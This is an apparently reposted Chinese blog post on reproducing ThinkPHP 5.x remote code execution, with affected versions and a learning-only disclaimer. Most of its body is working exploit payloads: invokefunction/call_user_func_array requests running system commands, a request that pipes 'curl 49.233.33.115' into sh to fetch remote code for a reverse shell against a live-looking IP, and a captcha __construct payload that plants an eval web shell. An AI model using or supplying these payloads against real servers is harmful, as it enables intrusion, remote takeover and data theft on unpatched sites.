Thinkphp5.x反序列化漏洞复现

Posted 星球守护者

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Thinkphp5.x反序列化漏洞复现相关的知识,希望对你有一定的参考价值。

介绍

  • Thinkphp是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。

  • 最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。

  • ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。

影响版本

  • ThinkPHP 5.0.x (<=5.0.23)

  • ThinkPHP5.x < (5.1.31)

实验环境

漏洞复现一(工具)

第一步 漏洞检测

第二步 执行命令

漏洞复现二(反弹shell)

http://1.14.65.168:8077//?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1

Host: 1.14.65.168:8077

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/92.0.4515.159 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

GET //?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%2049.233.33.115|sh HTTP/1.1

Host: 1.14.65.168:8077

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

 

漏洞复现三 (连接)

漏洞点:

POST /index.php?s=captcha&_method=__construct&method=get&filter[]=system&get[]=ipconfig

url  /?s=captcha

密码:

body下添加键值

_method=__construct

filter[]=assert

method=get

get[]=eval($_POST['密码']);

免责声明

`本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!`

以上是关于Thinkphp5.x反序列化漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

weblogic反序列化漏洞复现( CVE-2019-2725)

Jboss反序列化漏洞复现(CVE-2017-12149)

php反序列化漏洞复现

JBOOS反序列化漏洞复现

有关Apache dubbo反序列化漏洞的复现及思考

thinkphp5.x命令执行漏洞复现及环境搭建